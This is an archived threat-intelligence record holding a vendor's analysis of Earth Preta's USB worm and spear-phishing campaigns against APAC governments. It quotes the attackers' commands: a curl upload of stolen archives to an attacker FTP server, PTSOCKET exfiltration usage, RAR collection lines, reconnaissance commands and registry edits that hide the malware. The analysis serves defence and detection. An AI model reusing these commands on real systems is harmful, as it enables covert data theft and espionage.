{
	"id": "9c4d94b8-7350-462a-8689-77b9d9a651b5",
	"created_at": "2026-04-06T00:14:49.483075Z",
	"updated_at": "2026-04-10T13:12:37.360719Z",
	"deleted_at": null,
	"sha1_hash": "a8a60442237f5031be077576a1209257d3445fcd",
	"title": "Earth Preta Evolves its Attacks with New Malware and Strategies",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 13280139,
	"plain_text": "Earth Preta Evolves its Attacks with New Malware and Strategies\r\nBy: Lenart Bermejo, Sunny Lu, Ted Lee Sep 09, 2024 Read time: 11 min (2847 words)\r\nPublished: 2024-09-09 · Archived: 2026-04-05 15:27:12 UTC\r\nMalware\r\nIn this blog entry, we discuss our analysis of Earth Preta’s enhancements in their attacks by introducing new tools,\r\nmalware variants and strategies to their worm-based attacks and their time-sensitive spear-phishing campaign.\r\nSummary\r\nEarth Preta has upgraded its attacks, which now include the propagation of PUBLOAD via a variant of the\r\nworm HIUPAN.\r\nAdditional tools, such as FDMTP and PTSOCKET, were used to extend Earth Preta’s control and data\r\nexfiltration capabilities.\r\nAnother campaign involved spear-phishing emails with multi-stage downloaders like DOWNBAIT and\r\nPULLBAIT, leading to further malware deployments.\r\nEarth Preta’s attacks are highly targeted and time-sensitive, often involving rapid deployment and data\r\nexfiltration, with a focus on specific countries and sectors within the APAC region.\r\nEarth Preta has been known to launch campaigns against valued targets in the Asia-Pacific (APAC) region. Our recent\r\nobservations on their attacks against various government entities in the region show that the threat group has\r\nupdated their malware and strategies.\r\nWorm-based Attack Progression\r\nEarth Preta employed a variant of the worm HIUPAN to propagate PUBLOAD into their targets' networks via\r\nremovable drives. PUBLOAD was used as the main control tool for most of the campaign and to perform various\r\ntasks, including the execution of tools such as RAR for collection and curl for data exfiltration.\r\nPUBLOAD was also used to introduce supplemental tools into the targets' environment, such as FDMTP to serve\r\nas a secondary control tool, which was observed to perform tasks similar to those of PUBLOAD; and PTSOCKET,\r\na tool used as an alternative exfiltration option. 
A short attack overview can be seen in Figure 1.\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 1 of 20\n\nFigure 1. Attack chain\r\nInitial Access and Propagation\r\nIt was established that PUBLOAD is among the first-stage control tools deployed by Earth Preta. While spear-phishing emails were previously used to deliver PUBLOAD, it has been recently observed that a version of\r\nPUBLOAD is delivered via a variant of HIUPAN propagating through removable drives (Figure 2). This HIUPAN\r\nvariant differs from the previously documented variant, which was used to propagate ACNSHELL,\r\nalthough its main utility within the attack chain stays the same.\r\nFigure 2. Overview of HIUPAN\r\nThis variant is easier to configure, as it has an external config file that holds basic information for its propagation\r\nand watchdog function (Figure 3).\r\nFigure 3. HIUPAN configuration\r\nHIUPAN’s configuration has two main components: one decimal value and a list of filenames that\r\nHIUPAN will spread with it when it propagates (Table 1). The decimal value serves as the watcher function’s\r\nsleep multiplier (decimal value * 0x3e8 = sleep time) and determines the sleep timer before the watcher function\r\nperforms its check again.\r\nType | Value | Purpose\r\nDecimal value | 10 | Watcher sleep multiplier\r\nFilename | UsbConfig.exe | HIUPAN host for DLL side-loading\r\nFilename | u2ec.dll | HIUPAN malware\r\nFilename | WCBrowserWatcher.exe | PUBLOAD host for DLL side-loading\r\nFilename | coccocpdate.dll | PUBLOAD loader\r\nFilename | CocBox.zip | PUBLOAD encrypted component\r\nFilename | $.ini | HIUPAN configuration file\r\nTable 1. 
Example of HIUPAN configuration values\r\nHIUPAN Installation\r\nHIUPAN will install its copy and copies of the files that are listed in its configuration file (in this case, a PUBLOAD\r\ninstallation set) to C:\\ProgramData\\Intel\\_\\. It will also create an autorun registry entry for its installed copy:\r\n[HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\r\nUsbConfig = C:\\ProgramData\\Intel\\_\\UsbConfig.exe\r\nHIUPAN will also modify the values of the following registry entries to hide its presence and that of its accompanying\r\nmalware. These values will also be checked every time HIUPAN executes:\r\n[HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced]\r\nShowSuperHidden = 0\r\nHidden = 2\r\nHideFileExt = 1\r\nWatcher Function and Propagation\r\nOnce launched from its install directory, HIUPAN will launch its watcher function, which will periodically check\r\nif there are removable and hot-pluggable drives plugged into the infected machine (Figure 4). If one is available, it\r\nwill propagate to the removable drive by storing its copy, copies of the files listed in its configuration, and its\r\nconfiguration file to a storage directory named \u003cremovable drive\u003e:\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\ (Figure 5).\r\nHIUPAN will also add another copy of its host file (UsbConfig.exe) and main worm component (u2ec.dll) into\r\nthe root directory of the removable drive (Figure 5). It will then move all files and directories to \u003cremovable\r\ndrive\u003e:\\_\\ so that UsbConfig.exe remains the only visible file when an unsuspecting user plugs in and opens the\r\nremovable drive, baiting them into clicking it and unknowingly spreading the worm into a new environment.\r\nFigure 4. Creates a list of qualified drives for propagation\r\nFigure 5. 
HIUPAN spreading to removable drives\r\nThe same watcher function will also periodically check and make sure that the PUBLOAD host process\r\n(WCBrowserWatcher.exe) is running and will launch it from the install directory if it is not, as shown in Figure 6.\r\nFigure 6. HIUPAN watcher for PUBLOAD\r\nNetwork Discovery, Persistence and Control\r\nPUBLOAD\r\nWhile HIUPAN facilitates propagation via removable drives, PUBLOAD has been observed to perform initial\r\nsystem info collection to map out the current network.\r\nPUBLOAD’s tactics, techniques, and procedures (TTPs) remain mostly the same as those of the previously documented\r\nvariant used in Earth Preta’s previous spear-phishing campaign against governments. The variant propagated by\r\nHIUPAN uses C:\\ProgramData\\CocCocBrowser\\ as its install path, as it uses CocCocUpdate.exe, a component of a browser application popular in Vietnam, as its DLL side-loading host. PUBLOAD has its own installation routine, which\r\nincludes copying all components to its install path and creating an autorun registry entry and a scheduled task (Figure\r\n7).\r\nFigure 7. 
PUBLOAD install command\r\nTo map the network, the following commands will be executed in sequence and in very short intervals via cmd:\r\nhostname\r\narp -a\r\nwhoami\r\nipconfig /all\r\nnetstat -ano\r\nsysteminfo\r\nWMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List\r\nwmic startup get command,caption\r\ncurl http://myip.ipip.net\r\nnetsh wlan show interface\r\nnetsh wlan show networks\r\nnetsh wlan show profiles\r\nwmic logicaldisk get caption,description,providername\r\ntasklist\r\ntracert -h 5 -4 google.com\r\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nPUBLOAD also facilitates the delivery of additional tools into the compromised system. In this specific attack\r\nchain, PUBLOAD has delivered FDMTP as a secondary control tool and PTSOCKET for exfiltration to some\r\ninfected systems.\r\nFDMTP\r\nFDMTP is a newly found hacktool used by Earth Preta. It is a simple malware downloader implemented based on\r\nTouchSocket over Duplex Message Transport Protocol (DMTP).\r\nIn the recent campaign, threat actors embedded FDMTP in the data section of a DLL (Figure 8), from which it can\r\nthen be launched through DLL side-loading. For defense evasion, the embedded network\r\nconfigurations are encoded and encrypted via Base64 and DES (Figures 9 and 10).\r\nFigure 8. Main function of FDMTP\r\nFigure 9. Encrypted configuration and DES key\r\nFigure 10. Decrypted configuration\r\nCollection and Exfiltration\r\nCollection of data is done regularly using RAR, targeting files (.doc, .docx, .xls, .xlsx, .pdf, .ppt, .pptx) modified\r\nat specified cutoff dates. 
Exfiltration is performed using different methods; the most common one is using cURL\r\nto upload the archived files to an attacker-owned FTP site, with updated credentials. PUBLOAD’s collection\r\nactivity via RAR can be observed as follows:\r\nC:\\Progra~1\\WinRAR\\Rar.exe a -r -tk -ta\u003ccutoff date/datetime\u003e -n*.doc* -n*.docx* -n.xls* -n*.pdf* -n*.ppt* -n*.pptx* -n*.txt* C:\\programata\\IDM\\\u003cmachine name-\u003croot drive of target collection directories\u003e.rar \u003cstart directory or root drive for collection\u003e\r\nPUBLOAD also performs exfiltration via cURL, by sending the archived data to an attacker-owned FTP site:\r\ncurl --progress-bar -C --T C:\\programdata\\IDM\\\u003carchive name\u003e.RAR ftp://\u003cftp username\u003e:\u003cftp password\u003e@\u003cPUBLOAD ftp server\u003e\r\nThe first instance of the collection and exfiltration commands executed by PUBLOAD is also part of its command\r\nsequence mentioned in the network discovery section above, with time intervals of less than a minute.\r\nAn alternative method of exfiltration is by using PTSOCKET, which is a customized file transfer tool\r\nimplemented based on TouchSocket over DMTP (Figure 11). Depending on its arguments, PTSOCKET can be used to\r\ntransfer files in multi-thread mode. In the recent campaign, it was used as an exfiltration tool to upload the collected\r\ndata onto the remote server (Figure 12).\r\nFigure 11. File transfer function of PTSOCKET\r\nUsage:\r\n{PTSOCKET} -h [host]:[port] -p [uploaded file path] -s [saved file path] -t [num of thread]\r\nFigure 12. Exfiltration via PTSOCKET\r\nSpear-phishing Attack Progression\r\nEarth Preta has initiated a fast-paced spear-phishing campaign that we started to observe in June. 
As shown in Figure\r\n13, this campaign made use of a spear-phishing email with an attached .url file that will download a downloader\r\nnamed DOWNBAIT, which will download a decoy document. Based on our telemetry, we can expect that the\r\nemails’ contents are related to the decoy document. This will continue the chain of infection with PULLBAIT to\r\nload CBROVER, which will then be used to deliver PLUGX. Collection will be performed via RAR and a tool\r\nnamed FILESAC. Stolen information will be sent to attacker-controlled infrastructure using a currently\r\nunknown tool. Based on our telemetry, the information may be sent to an attacker-controlled cloud service.\r\nFigure 13. Spear-phishing attack flow\r\nDelivery\r\nA spear-phishing email containing a .url attachment is sent to unsuspecting victims. This leads to the download\r\nand execution of DOWNBAIT, a signed downloader and loader tool used to download PULLBAIT, leading to the\r\ndownload and execution of CBROVER.\r\nDOWNBAIT and PULLBAIT\r\nDOWNBAIT is a first-stage downloader meant to download the decoy document and a downloader shellcode\r\ncomponent. DOWNBAIT is a digitally signed tool (Figure 14); this is an attribute that can add to its evasiveness\r\nor bypass other security measures that check for digital signatures before allowing execution of applications.\r\nFigure 14. Signature of DOWNBAIT\r\nDOWNBAIT’s code is encrypted with a multi-layered XOR and will be decrypted upon execution (Figure 15).\r\nFigure 15. Decryption of DOWNBAIT code\r\nDOWNBAIT downloads and executes the decoy document from an attacker-controlled server (Figure 16). From\r\nthe same server, it will also download the PULLBAIT shellcode and execute it in memory (Figure 17).\r\nFigure 16. 
Download and execute decoy document\r\nFigure 17. Download and execute PULLBAIT into memory\r\nPULLBAIT is a straightforward shellcode which will perform further download and execution. In the observed\r\ncampaign, PULLBAIT will download and execute CBROVER, the first-stage backdoor (Figure 18).\r\nFigure 18. PULLBAIT downloads and executes CBROVER\r\nThe spear-phishing email and the .url attachment are tailored to the targets and are paired with the decoy\r\ndocuments. Up until this point, all tools and components are downloaded from an attacker-controlled WebDAV\r\nserver hosted at 16[.]162[.]188[.]93.\r\nNetwork Discovery, Persistence, and Control\r\nCBROVER and PLUGX\r\nCBROVER is a backdoor that supports file download and remote shell execution. It’s spawned by using DLL\r\nside-loading techniques (Figure 19).\r\nFigure 19. CBROVER spawned via DLL side-loading\r\nThrough CBROVER, the first PLUGX components (Table 2) were deployed to the target machine and launched\r\nthrough DLL side-loading techniques (Figure 20).\r\nFile name | Description\r\nkmrefresh.exe | Legitimate executable used to load coreglobconfig.dll\r\ncoreglobconfig.dll | Malicious loader used to execute PLUGX (glob.dat)\r\nglob.dat | Encrypted PLUGX\r\nTable 2. List of the first PLUGX components deployed through CBROVER\r\nFigure 20. First PLUGX components (kmrefresh.exe) deployed and executed through CBROVER\r\n(Edge.exe)\r\nAfter checking the components, the deployed PLUGX variant is the same as the general type of PLUGX which was\r\nused by Earth Preta in previous DOPLUGS campaigns.\r\nAfterward, a file collector, tracked as FILESAC, was deployed into the compromised machine and started to\r\ncollect the victim’s files (Figure 21). 
The details about FILESAC are discussed in the “Collection and\r\nExfiltration” section of this blog entry.\r\nFigure 21. PLUGX components (kmrefresh.exe) injected into dllhost.exe and dropping FILESAC\r\n(FileServer0501.exe) for data collection\r\nIt’s worth noting that second-stage PLUGX components (shown in Table 3) are delivered through the prior PLUGX\r\nafter the initial PLUGX installation. Compared to first-stage PLUGX, the second-stage PLUGX shellcode was\r\nprotected by using RC4 and Data Protection API (DPAPI), which relies on keys tied to specific user accounts on\r\nspecific machines. The execution of those environmentally keyed payloads is constrained to a specific target\r\nenvironment and poses a challenge for follow-up malware analysis.\r\nFile name | Description\r\nCanonlog.exe | Legitimate executable used to load coreglobconfig.dll\r\nceiinfolog.dll | Malicious loader used to execute PLUGX (cannon.dat)\r\ncannon.dat | Second-stage PLUGX (encrypted by RC4 and DPAPI)\r\nTable 3. List of second-stage PLUGX components\r\nCollection and Exfiltration\r\nCollection has been observed to be performed in two ways:\r\nThe first method is via RAR, which is launched by PLUGX via command line:\r\n\"RAR.exe a -r -m3 -tk -ed -dh -v4500m -hp\u003carchive password\u003e -ibck -ta\u003ccutoff date\u003e -n*.doc* -n*.rtf* -n*.xls* -n*.pdf* -n*.ppt* -n*.jpg* -n*.cdr* -n*.dwg* -n*.png* -n*.psd* -n*.JPE* -n*.BMP* -n*.TIF* -n*.dib* \\\"\u003ccollection storage path\u003e\\\\\u003carchive name\u003e.RAR\\\" \\\"\u003ctarget path for collection\u003e\"\"\r\nThe second method is by using FILESAC, a configurable tool, which will be downloaded and launched\r\nby PLUGX. 
It’s implemented based on an open-source tool, “FileSearchAndCompress”, and its\r\nconfiguration was embedded in the tool as follows:\r\nTarget file types: doc|docx|xls|xlsx|ppt|pptx|pdf|jpg|cdr|dwg\r\nTarget time: 2024-05-01 ~ 2024-12-31\r\nIn our telemetry, we have observed that collected documents are exfiltrated using a currently unknown tool. Based\r\non what we observed, the tool accepts the archive filename as its argument, and upon inspecting the generated\r\nnetwork traffic, we found that the tool connects to several IP addresses that are related to Microsoft’s cloud services, which\r\ninclude the identity platform for token exchange, the Graph API host, and OneDrive-related endpoints.\r\nFigure 22. Tool outbound connections after being launched by PLUGX\r\nThis kind of traffic implies that the tool uses a refresh token, connecting to the identity platform to exchange\r\nit for an authentication token, and then interacts with a cloud service (implied to be OneDrive) using the Graph API.\r\nOther Observations on 16[.]162[.]188[.]93\r\nDuring our inspection of the download site at IP address 16[.]162[.]188[.]93, we discovered that it hosts a\r\nWebDAV server (Figure 23). This server contains numerous decoy documents, along with various malware\r\nsamples, including DOWNBAIT, PULLBAIT, and CBROVER.\r\nFigure 23. The file server of 16[.]162[.]188[.]93\r\nInside the folder “/1”, the malware PULLBAIT and CBROVER are located, and in the folder “/projects” there are\r\ntwo subfolders, “/documents” and “/done”. The archived DOWNBAIT is stored in the folder “/done”,\r\nwhile the decoy documents are found in the folder “/documents” (Figure 24).\r\nAll the subfolders within these two directories are named after the dates they were created. 
The earliest-created\r\nfolder is “2024-06-5” and the latest one is “2024-07-11”. Since the files within the date-named folders are deleted\r\nafter around one day, we believe that the actions targeting specific victims are executed very quickly, within a\r\nsingle day.\r\nFigure 24. The subfolders in “/projects/documents/”\r\nBased on the filenames and content of the decoy documents, we can potentially identify their targets. The\r\ncountries that were likely targeted include Myanmar, the Philippines, Vietnam, Singapore, Cambodia and Taiwan,\r\nall located in the APAC region. Additionally, the decoy documents predominantly focus on topics related to\r\ngovernment, particularly foreign affairs (Figures 25 and 26).\r\nFigure 25. Decoy document from the Communist Party in Vietnam\r\nFigure 26. Decoy invitation to the 2024 Global Leadership Program\r\nConclusion\r\nEarth Preta has shown significant advancements in their malware deployment and strategies, particularly in their\r\ncampaigns targeting government entities, which include those in the military, police, foreign affairs agencies,\r\nwelfare, the executive branch, and education in the APAC region.\r\nThe group has evolved their tactics, notably with sophisticated malware variants like HIUPAN and its ability to\r\npropagate via removable drives, which allows it to quickly deliver PUBLOAD; and the introduction of new tools\r\nlike FDMTP and PTSOCKET to enhance their control and exfiltration capabilities.\r\nAdditionally, the recent fast-paced spear-phishing campaigns we observed in June demonstrate their adaptability,\r\nleveraging multi-stage downloaders (from DOWNBAIT to PLUGX) and possibly exploiting Microsoft's cloud\r\nservices for data exfiltration. 
The quick turnover of decoy documents and malware samples on the WebDAV\r\nserver hosted at 16[.]162[.]188[.]93 suggests that Earth Preta is executing highly targeted and time-sensitive\r\noperations, focusing on specific countries and industries within the APAC region. Earth Preta has remained highly\r\nactive in APAC and will likely remain active in the foreseeable future. This evolving threat landscape highlights\r\nthe need for continuous vigilance and updated defensive measures to counteract Earth Preta's sophisticated and\r\nadaptive techniques.\r\nMITRE ATT\u0026CK\r\nTactic | Technique | ID | Description\r\nInitial Access | Replication Through Removable Media | T1091 | HIUPAN spreads through removable drives to deliver PUBLOAD\r\nInitial Access | Phishing: Spearphishing Attachment | T1566.001 | Uses spear-phishing email to gain access to targets’ systems\r\nPersistence | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547.00 | Uses Registry Run keys for persistence\r\nPersistence | Scheduled Task/Job: Scheduled Task | T1053.005 | Uses a scheduled task for persistence\r\nDefense Evasion | Hijack Execution Flow: DLL Side-Loading | T1574.002 | Several of the malware components are loaded using DLL side-loading\r\nDefense Evasion | Execution Guardrails: Environmental Keying | T1480.001 | Second-stage PLUGX payload is protected with RC4 and DPAPI\r\nDefense Evasion | Subvert Trust Controls: Code Signing | T1553.002 | DOWNBAIT is digitally signed\r\nDefense Evasion | Process Injection | T1055 | PLUGX injects its code into other processes it launches with varying arguments\r\nDiscovery | System Information Discovery | T1082 | Commands such as hostname and systeminfo are used to perform system information discovery\r\nDiscovery | Software Discovery: Security Software Discovery | T1518.001 | WMIC is used to discover installed AV products\r\nDiscovery | System Network 
Connections Discovery | T1049 | Netstat is used to discover network connections\r\nDiscovery | System Network Configuration Discovery | T1016 | Commands like ipconfig and netsh are used to discover network configuration\r\nCollection | Data from Local System | T1005 | FILESAC is used to search for specific file types of interest within the system\r\nCollection | Archive Collected Data: Archive via Utility | T1560.001 | Use of WinRAR or FILESAC to archive collected data\r\nExfiltration | Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | Telemetry information suggests possible exfiltration to a cloud service\r\nExfiltration | Exfiltration Over Alternative Protocol | T1048 | Data are exfiltrated to attacker-controlled servers using cURL or PTSOCKET\r\nCommand and Control | Application Layer Protocol: Web Protocols | T1071.001 | Downloaders and backdoors communicate with C\u0026C using HTTP/HTTPS\r\nIndicators of Compromise (IOCs)\r\nThe full list of IOCs can be found here.\r\nSource: https://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html"
	],
	"report_names": [
		"earth-preta-new-malware-and-strategies.html"
	],
	"threat_actors": [
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434489,
	"ts_updated_at": 1775826757,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a8a60442237f5031be077576a1209257d3445fcd.pdf",
		"text": "https://archive.orkl.eu/a8a60442237f5031be077576a1209257d3445fcd.txt",
		"img": "https://archive.orkl.eu/a8a60442237f5031be077576a1209257d3445fcd.jpg"
	}
}